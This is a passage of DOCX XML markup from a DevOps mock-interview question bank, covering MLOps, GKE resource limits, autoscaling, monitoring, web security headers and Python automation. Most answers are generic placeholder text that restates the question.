      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. How is your experience with MLOps and AI infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI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is your experience with MLOps and AI infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. What kind of MLOps or AI infrastructure work have you done?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI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kind of MLOps or AI infrastructure work have you done?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 73 - Senior GKE Architecture Resource Security and Cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Talk in detail about your core roles and responsibilities in your current role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Role/Responsibilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Role/Responsibilities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Talk in detail about your core roles and responsibilities in your current role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Can you explain your current project using a specific client or application as an example?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Project Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Project Architecture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Can you explain your current project using a specific client or application as an example?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Explain the infrastructure architecture of one application from end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Project Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Project Architecture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the infrastructure architecture of one application from end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Where does this application run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Runtime Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Runtime Platform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Where does this application run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are all the infrastructure components required for this application to run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Infrastructure Architecture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all the infrastructure components required for this application to run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Who decides the CPU and memory limits for the application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Resources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Who decides the CPU and memory limits for the application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you determine the CPU and memory requests and limits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Resources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determine the CPU and memory requests and limits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Does the application team also approve the resource sizing because of the cloud cost?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Cost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Does the application team also approve the resource sizing because of the cloud cost?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What resource quotas or limits do you configure in a Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Quotas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Quotas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resource quotas or limits do you configure in a Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do CPU requests and limits work in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Resources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CPU requests and limits work in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What happens if a container exceeds its memory limit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Resources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happens if a container exceeds its memory limit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What happens if a container exceeds its CPU limit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Resources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happens if a container exceeds its CPU limit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What is the difference between CPU utilization and memory utilization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Systems/Resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Systems/Resources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CPU utilization and memory utilization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How is memory different from disk storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Systems/Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Systems/Storage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is memory different from disk storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What monitoring tools do you use for the application and infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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monitoring tools do you use for the application and infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Apart from native GCP monitoring, what third-party monitoring tools do you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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Apart from native GCP monitoring, what third-party monitoring tools do you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. What does Prisma Cloud monitor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Prisma Cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Prisma Cloud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does Prisma Cloud monitor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Does Prisma monitor IAM security and network security only, or does it also cover application security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Prisma Cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Prisma Cloud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Does Prisma monitor IAM security and network security only, or does it also cover application security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Have you worked on application security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Application Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Application 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on application security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. Have you worked on penetration testing or vulnerability assessment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Application Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Application 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on penetration testing or vulnerability assessment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Can you give an example of an application security vulnerability that you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Application Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Application 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Can you give an example of an application security vulnerability that you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. What are some important HTTP security headers that should be present?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Web Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Web 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some important HTTP security headers that should be present?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. What does Content Security Policy (CSP) do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Web Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Web 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does Content Security Policy (CSP) do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How does Cluster Autoscaler work in Kubernetes/GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Autoscaling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Cluster Autoscaler work in Kubernetes/GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. Do you have real-time monitoring for the Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/GKE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/GKE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 you have real-time monitoring for the Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. If there is a sudden spike in traffic, how does autoscaling work in real time?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Autoscaling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there is a sudden spike in traffic, how does autoscaling work in real time?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. I am referring to node autoscaling, not pod autoscaling. How does node autoscaling work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Autoscaling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 am referring to node autoscaling, not pod autoscaling. How does node autoscaling work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. What happens if, due to some unknown issue, the Cluster Autoscaler keeps creating new nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Autoscaling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happens if, due to some unknown issue, the Cluster Autoscaler keeps creating new nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. How do you control the cloud cost when Cluster Autoscaler keeps scaling nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Cost/Governance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Cost/Governance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control the cloud cost when Cluster Autoscaler keeps scaling nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 74 - Python Automation and FastAPI DevOps Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How have you used Python for DevOps automation in real projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I use Python mainly where automation needs structure, APIs, error handling, and maintainability. Examples include calling cloud APIs, validating Kubernetes manifests, generating reports from logs or metrics, checking IAM or security posture, automating deployment checks, and building small internal tools. For a senior DevOps role, I do not treat Python scripts as one-off files. I add configuration, logging, retries, dry-run mode, clear exit codes, tests for critical logic, and documentation so the team can run the automation safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you design a Python script to automate repeated cloud or Kubernetes operational tasks?</w:t>
      </w:r>
